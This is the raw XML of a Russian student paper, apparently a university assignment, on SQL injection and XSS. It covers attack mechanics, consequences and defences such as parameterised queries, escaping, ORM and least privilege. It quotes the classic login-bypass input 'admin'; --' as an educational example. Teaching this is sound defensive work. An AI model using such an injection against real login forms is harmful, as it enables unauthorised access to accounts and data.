      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">вредоносного SQL кода в запрос, который может быть выполнен базой данных. Это позволяет злоумышленнику управлять структурой и содержимым базы данных, получая несанкционированный доступ к информации, изменяя, уничтожая или иным образом нарушая целостность данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атака SQL-инъекции может выполняться следующим образом: когда веб-приложение запрашивает информацию у пользователя (например, имя пользователя и пароль для входа в систему), оно может бездумно включать эту информацию в SQL запрос. Если злоумышленник вводит в это поле SQL код, приложение может выполнить этот код как часть запроса, открывая доступ к базе данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Например, простейшая атака может выглядеть так: если форма входа ожидает имени пользователя в виде строки, атакующий может ввести что-то вроде</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'; --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После подстановки этого в SQL запрос, он может выглядеть так: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--' AND password = ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь всё после символов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игнорируется, так как в SQL они означают комментарий, и злоумышленник успешно вошел в систему как администратор, даже не зная пароль.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Существует несколько стратегий противодействия SQL-инъекциям. Они включают в себя использование параметризованных запросов, которые гарантируют, что пользовательский ввод не будет интерпретироваться как SQL код, и экранирование входных данных, чтобы специальные символы не могли быть использованы для изменения структуры запросов. Безопасное программирование и активное тестирование на уязвимости также являются важными стратегиями противодействия.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="последствия-атак-на-основе-sql-инъекци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Последствия атак на основе SQL-инъекции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Успешная SQLi-атака может нанести серьезный ущерб бизнесу. SQL-инъекция может привести к следующим последствиям:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Раскрытие конфиденциальных данных. Атакующие могут заполучить конфиденциальную информацию, хранящуюся на SQL-сервере.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Компрометация целостности данных. Злоумышленники могут отредактировать или удалить информацию в вашей системе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нарушение приватности пользователей. В зависимости от того, какие данные хранятся на SQL-сервере, атака может привести к раскрытию конфиденциальных пользовательских данных – адресов, номеров телефонов и сведений банковских карт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получение злоумышленниками административного доступа к вашей системе. Если у пользователя базы данных есть привилегии администратора, с помощью вредоносного кода атакующий может заполучить доступ к системе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получение злоумышленниками общих прав доступа к вашей системе. Если для проверки имен пользователей и паролей применяются слишком простые SQL-команды, атакующий сможет заполучить доступ к вашей системе, даже не имея действующих учетных данных пользователя. После этого злоумышленник сможет добраться до конфиденциальной информации и изменить ее, создав большие проблемы для вашего бизнеса.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ущерб от SQLi-атак не только финансовый. Успешная атака может привести к репутационным потерям и утрате доверия клиентов, если произойдет кража персональной информации – имен, адресов, телефонных номеров и данных кредитных карт. Вернуть доверие клиентов гораздо сложнее, чем его потерять.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="как-бороться-с-sql-инъекцией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Как бороться с SQL-инъекцией</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главные принципы борьбы с sql инъекцией:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Экранирование</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Валидация входных параметров, которые необходимо пробросить в sql запрос</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использование ORM для упрощения процесса экранирования параметров</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Регулярное тестирование на предмет возможной SQL - инъекции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Придерживание принципа минимальных привилегий</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37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заключении, SQL-инъекции и XSS-атаки представляют собой серьезную угрозу для веб-ресурсов и их пользователей. Они могут привести к краже личных и конфиденциальных данных, манипуляциям с пользовательским интерфейсом, выполнению вредоносного кода на стороне клиента, угрозе репутации веб-сайта и возникновению юридических проблем. Но, следуя основным принципам безопасного программирования, применяя адекватные меры предосторожности и проводя регулярные проверки на уязвимости, мы можем значительно снизить риск подверженностивданным атакам. Это включает в себя валидацию и экранирование пользовательского ввода, использование параметризованных запросов, ORM и принципа наименьших привилегий, а также применение таких механизмов, как CSP и специальные HTTP-заголовки.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creator>Косолапов Степан Эдуардович НПИбд-01-20</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-19T03:46:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-19T03:46:35Z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True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="mainfont">
    <vt:lpwstr>Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="mainfontoptions">
    <vt:lpwstr>Ligatures=TeX</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="monofont">
    <vt:lpwstr>Calibri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Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="romanfontoptions">
    <vt:lpwstr>Ligatures=TeX</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="sansfont">
    <vt:lpwstr>Calibri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Ошибки проверки вводимых данных: межсайтовый скриптинг в веб-приложениях, межсайтовый скриптинг при наличии SQL-инъекции.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